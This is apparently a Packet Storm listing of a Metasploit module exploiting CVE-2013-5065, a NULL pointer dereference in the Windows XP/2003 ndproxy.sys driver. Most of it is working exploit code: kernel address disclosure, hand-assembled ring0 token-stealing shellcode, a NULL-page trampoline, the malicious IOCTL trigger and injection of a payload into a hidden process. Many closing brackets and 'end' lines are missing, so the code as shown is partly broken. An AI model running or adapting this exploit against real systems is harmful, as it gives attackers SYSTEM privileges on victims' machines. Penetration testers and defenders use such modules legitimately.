Microsoft Windows ndproxy.sys Local Privilege Escalation

Posted Dec 17, 2013
Authored by juan vazquez, temp66, ryujin, Shahin Ramezany | Site metasploit.com

This Metasploit module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003 SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used to access an array unsafely, and the value is used to perform a call, leading to a NULL pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This Metasploit module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote Access" must be running on the target system.

tags | exploit, remote
systems | windows
advisories | CVE-2013-5065
SHA-256 | 6dc1df60dff4c2b60d7508a57233b6b3e7f565f218bceb0acc2a53045b172ce0

# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process

def initialize(info={})
super(update_info(info, {
'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
to access an array unsafely, and the value is used to perform a call, leading to a NULL
pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
work the service "Routing and Remote Access" must be running on the target system.
'License' => MSF_LICENSE,
'Author' =>
'Unknown', # Vulnerability discovery
'ryujin', # python PoC
'Shahin Ramezany', # C PoC
'juan vazquez' # MSF module
'Arch' => ARCH_X86,
'Platform' => 'win',
'Payload' =>
'Space' => 4096,
'DisableNops' => true
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
'EXITFUNC' => 'thread',
'Targets' =>
[ 'Automatic', { } ],
[ 'Windows XP SP3',
'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
'_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
'_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct
'_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct
'_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct
[ 'Windows Server 2003 SP2',
'HaliQuerySystemInfo' => 0x1fa1e,
'_KPROCESS' => "\x38",
'_TOKEN' => "\xd8",
'_UPID' => "\x94",
'_APLINKS' => "\x98"
'References' =>
[ 'CVE', '2013-5065' ],
[ 'OSVDB' , '100368'],
[ 'BID', '63971' ],
[ 'EDB', '30014' ],
[ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'],
[ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
[ 'URL', 'http://www.secniu.com/blog/?p=53' ],
[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ],
[ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ]
'DisclosureDate'=> 'Nov 27 2013',
'DefaultTarget' => 0


def add_railgun_functions
["DWORD", "ProcessHandle", "in"],
["PBLOB", "BaseAddress", "inout"],
["PDWORD", "ZeroBits", "in"],
["PBLOB", "RegionSize", "inout"],
["DWORD", "AllocationType", "in"],
["DWORD", "Protect", "in"]

[ "DWORD", "FileHandle", "in" ],
[ "DWORD", "Event", "in" ],
[ "DWORD", "ApcRoutine", "in" ],
[ "DWORD", "ApcContext", "in" ],
[ "PDWORD", "IoStatusBlock", "out" ],
[ "DWORD", "IoControlCode", "in" ],
[ "LPVOID", "InputBuffer", "in" ],
[ "DWORD", "InputBufferLength", "in" ],
[ "LPVOID", "OutputBuffer", "in" ],
[ "DWORD", "OutPutBufferLength", "in" ]

[ "DWORD", "ProfileSource", "in" ],
[ "PDWORD", "Interval", "out" ]
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
["PBLOB", "lpImageBase", "out"],
["DWORD", "cb", "in"],
["PDWORD", "lpcbNeeded", "out"]
["LPVOID", "ImageBase", "in"],
["PBLOB", "lpBaseName", "out"],
["DWORD", "nSize", "in"]

def open_device(dev)

invalid_handle_value = 0xFFFFFFFF

r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)

handle = r['return']

if handle == invalid_handle_value
return nil

return handle

def find_sys_base(drvname)
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")

addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
return [address, current_drvname]

return nil

def ring0_shellcode(t)
restore_ptrs = "\x31\xc0" # xor eax, eax
restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax

tokenstealing = "\x52" # push edx # Save edx on the stack
tokenstealing << "\x53" # push ebx # Save ebx on the stack
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
tokenstealing << "\x8b\xc8" # mov ecx, eax
tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
tokenstealing << "\x75\xe8" # jne 0000101e ======================
tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
tokenstealing << "\x5b" # pop ebx # Restores ebx
tokenstealing << "\x5a" # pop edx # Restores edx
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!

ring0_shellcode = restore_ptrs + tokenstealing
return ring0_shellcode

def fill_memory(proc, address, length, content)

result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

unless proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil

vprint_good("#{address} is now writable")

result = proc.memory.write(address, content)

if result.nil?
vprint_error("Failed to write contents to memory")
return nil
vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

return address

def create_proc
windir = expand_path("%windir%")
cmd = "#{windir}\\System32\\notepad.exe"
# run hidden
proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
rescue Rex::Post::Meterpreter::RequestError
# when running from the Adobe Reader sandbox:
# Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
return nil

return proc.pid

def disclose_addresses(t)
addresses = {}

vprint_status("Getting the Kernel module name...")
kernel_info = find_sys_base(nil)
if kernel_info.nil?
vprint_error("Failed to disclose the Kernel module name")
return nil
vprint_good("Kernel module found: #{kernel_info[1]}")

vprint_status("Getting a Kernel handle...")
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
kernel32_handle = kernel32_handle['return']
if kernel32_handle == 0
vprint_error("Failed to get a Kernel handle")
return nil
vprint_good("Kernel handle acquired")

vprint_status("Disclosing the HalDispatchTable...")
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
hal_dispatch_table = hal_dispatch_table['return']
if hal_dispatch_table == 0
vprint_error("Failed to disclose the HalDispatchTable")
return nil
hal_dispatch_table -= kernel32_handle
hal_dispatch_table += kernel_info[0]
addresses["halDispatchTable"] = hal_dispatch_table
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")

vprint_status("Getting the hal.dll Base Address...")
hal_info = find_sys_base("hal.dll")
if hal_info.nil?
vprint_error("Failed to disclose hal.dll Base Address")
return nil
hal_base = hal_info[0]
vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")

hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
addresses["HaliQuerySystemInfo"] = hali_query_system_information

vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
return addresses

def check
vprint_status("Adding the railgun stuff...")

if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Detected

handle = open_device("\\\\.\\NDProxy")
if handle.nil?
return Exploit::CheckCode::Safe

os = sysinfo["OS"]
case os
when /windows xp.*service pack 3/i
return Exploit::CheckCode::Appears
when /[2003|.net server].*service pack 2/i
return Exploit::CheckCode::Appears
when /windows xp/i
return Exploit::CheckCode::Detected
when /[2003|.net server]/i
return Exploit::CheckCode::Detected
return Exploit::CheckCode::Safe


def exploit

vprint_status("Adding the railgun stuff...")

if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")

my_target = nil
if target.name =~ /Automatic/
print_status("Detecting the target system...")
os = sysinfo["OS"]
if os =~ /windows xp.*service pack 3/i
my_target = targets[1]
print_status("Running against #{my_target.name}")
elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
my_target = targets[2]
print_status("Running against #{my_target.name}")
elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
my_target = targets[2]
print_status("Running against #{my_target.name}")
my_target = target

if my_target.nil?
fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")

print_status("Checking device...")
handle = open_device("\\\\.\\NDProxy")
if handle.nil?
fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
print_good("\\\\.\\NDProxy found!")

print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
@addresses = disclose_addresses(my_target)
if @addresses.nil?
fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
print_good("Addresses successfully disclosed.")

print_status("Storing the kernel stager on memory...")
this_proc = session.sys.process.open
kernel_shell = ring0_shellcode(my_target)
kernel_shell_address = 0x1000
result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
if result.nil?
fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")

print_status("Storing the trampoline to the kernel stager on memory...")
trampoline = "\x90" * 0x38 # nops
trampoline << "\x68" # push opcode
trampoline << [0x1000].pack("V") # address to push
trampoline << "\xc3" # ret
trampoline_addr = 0x1
result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
if result.nil?
fail_with(Failure::Unknown, "Error while storing trampoline on memory")
print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")

print_status("Storing the IO Control buffer on memory...")
buffer = "\x00" * 1024
buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
buffer[28, 4] = [0x34].pack("V") # In order to trigger the vulnerable call
buffer_addr = 0x0d0d0000
result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
if result.nil?
fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")

print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
magic_ioctl = 0x8fff23c8
# Values taken from the exploit in the wild, see references
ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)


print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)

print_status("Checking privileges after exploitation...")

unless is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")

p = payload.encoded
print_good("Exploitation successful! Creating a new process and launching payload...")
new_pid = create_proc

if new_pid.nil?
print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")

print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
if execute_shellcode(p, nil, new_pid)
fail_with(Failure::Unknown, "Error while executing the payload")



